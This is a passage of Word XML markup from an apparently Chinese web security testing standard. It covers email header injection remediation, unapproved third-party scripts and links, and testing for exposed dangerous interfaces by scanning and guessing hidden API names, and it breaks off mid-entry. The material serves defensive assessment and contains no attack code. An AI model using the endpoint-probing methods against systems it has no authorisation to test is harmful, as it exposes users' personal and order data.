        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="009145B3" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>电子邮件注入允许恶意攻击者注入任意邮件头字段</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,BCC</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CC</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、主题等</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00EE4690" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它允许黑客通过注入手段从受害者的邮件服务器发送垃圾邮件</w:t>
      </w:r>
      <w:r w:rsidR="00C66B65" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD65271" w14:textId="77777777" w:rsidR="009145B3" w:rsidRPr="00844517" w:rsidRDefault="009145B3" w:rsidP="00844517">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629E07B0" w14:textId="77777777" w:rsidR="00FA167C" w:rsidRPr="00844517" w:rsidRDefault="00FA167C" w:rsidP="00844517">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="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可成功劫持密码找回等信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2591B1" w14:textId="41E74351" w:rsidR="009145B3" w:rsidRPr="00844517" w:rsidRDefault="00FA167C" w:rsidP="00844517">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="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可成功发送垃圾邮件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08530893" w14:textId="53B90DA0" w:rsidR="009145B3" w:rsidRPr="00844517" w:rsidRDefault="009145B3" w:rsidP="00844517">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="002A085F" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议从以下几个方面进行防御：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4511AA1C" w14:textId="77777777" w:rsidR="002A085F" w:rsidRPr="00844517" w:rsidRDefault="002A085F" w:rsidP="00844517">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLineChars="0" w:firstLine="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有用户输入应该被认为是不可信的。使用正则表达式来过滤用用户提交的数据。例如，可以在输入字符串中搜索</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(r </w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> n)</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F10A039" w14:textId="77777777" w:rsidR="002A085F" w:rsidRPr="00844517" w:rsidRDefault="002A085F" w:rsidP="00844517">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLineChars="0" w:firstLine="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用外部组件和库，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ZEND mail</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PEAR mail</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>swift mailer</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25494E8A" w14:textId="2BDF65C1" w:rsidR="009145B3" w:rsidRDefault="002A085F" w:rsidP="00844517">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLineChars="0" w:firstLine="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ModSecurity</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以阻止服务器级别的电子邮件注入。利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ModSecurity</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以检测通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提交的</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CC, BCC</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或目的地址，并且拒绝任何包含这些字母请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049DE134" w14:textId="5D53EBF9" w:rsidR="00BD5E6D" w:rsidRPr="00844517" w:rsidRDefault="00BD5E6D" w:rsidP="00BD5E6D">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="20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05E7941" w14:textId="2F4641E5" w:rsidR="009145B3" w:rsidRPr="00A82BA3" w:rsidRDefault="009145B3" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc498434516"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用第三方不可控脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82BA3">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="3B0BA929" w14:textId="04E9760F" w:rsidR="009145B3" w:rsidRPr="0071000E" w:rsidRDefault="009145B3" w:rsidP="0071000E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00C81D74" w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面中引用了不可控的脚本或超链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EF321F" w14:textId="5A1E23BD" w:rsidR="009145B3" w:rsidRPr="0071000E" w:rsidRDefault="009145B3" w:rsidP="0071000E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00C81D74" w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r w:rsidR="006A129F" w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面内容，是否引用了第三方未知脚本或超链接，如恶意的</w:t>
      </w:r>
      <w:r w:rsidR="006A129F" w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r w:rsidR="006A129F" w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本或病毒木马的下载链接等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4795F2BC" w14:textId="4ECBFA01" w:rsidR="009145B3" w:rsidRPr="0071000E" w:rsidRDefault="00C24790" w:rsidP="0071000E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="009145B3" w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="000D2040" w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidR="005234BF" w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可在网站中插入恶意链接或脚本，导致正常用户浏览时</w:t>
      </w:r>
      <w:r w:rsidR="005234BF" w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="005234BF" w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被窃取或被种植病毒木马。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8DE14C" w14:textId="77777777" w:rsidR="009145B3" w:rsidRPr="0071000E" w:rsidRDefault="009145B3" w:rsidP="0071000E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040919FF" w14:textId="362E4B22" w:rsidR="009145B3" w:rsidRPr="0071000E" w:rsidRDefault="00172CB7" w:rsidP="0071000E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：存在不可控外链或脚本，且未经过审批</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AFC909" w14:textId="20E70B99" w:rsidR="00172CB7" w:rsidRPr="0071000E" w:rsidRDefault="00172CB7" w:rsidP="0071000E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：存在不可控外链或脚本，但可提供审批记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747C97A3" w14:textId="72FAF377" w:rsidR="009145B3" w:rsidRDefault="009145B3" w:rsidP="0071000E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="004A2B56" w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议在不影响业务的前提下，对网站引用的文件和源代码进行审查，一经发现有未审批的外链或脚本</w:t>
      </w:r>
      <w:r w:rsidR="00526242" w:rsidRPr="0071000E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，应立即删除。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7790A564" w14:textId="77F3F602" w:rsidR="00BD5E6D" w:rsidRPr="0071000E" w:rsidRDefault="00BD5E6D" w:rsidP="0071000E">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76FEAEFD" w14:textId="2E24BAD4" w:rsidR="009145B3" w:rsidRPr="00A82BA3" w:rsidRDefault="005006B1" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc498434517"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启危险接口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="50B0562E" w14:textId="04397EA2"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00B73D2E" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启可利用的危险接口，如获取订单信息、用户身份信息等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E6FE93"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C11B68" w14:textId="71002610" w:rsidR="009145B3" w:rsidRPr="00A12C9A" w:rsidRDefault="0039585F" w:rsidP="00A12C9A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="00911BC6" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描器扫描</w:t>
      </w:r>
      <w:r w:rsidR="00F322D1" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特殊目录和链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C0ECB2" w14:textId="3F1135F8" w:rsidR="00F322D1" w:rsidRPr="00A12C9A" w:rsidRDefault="00F322D1" w:rsidP="00A12C9A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据正常接口的命名特征猜测隐藏的危险接口，如获取个人信息接口是</w:t>
      </w:r>
      <w:r w:rsidR="006A0DD4" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidR="006A0DD4" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>UserInfo</w:t>
      </w:r>
      <w:r w:rsidR="006A0DD4" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，猜测获取订单信息接口</w:t>
      </w:r>
      <w:r w:rsidR="00CE20B9" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getOrderDetail</w:t>
      </w:r>
      <w:r w:rsidR="00CE20B9" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6041C7D4" w14:textId="095743A2" w:rsidR="009145B3" w:rsidRPr="00A12C9A" w:rsidRDefault="00C24790" w:rsidP="00A12C9A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="009145B3" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00930B32" w:rsidRPr="00A12C9A">
        <w:rPr>
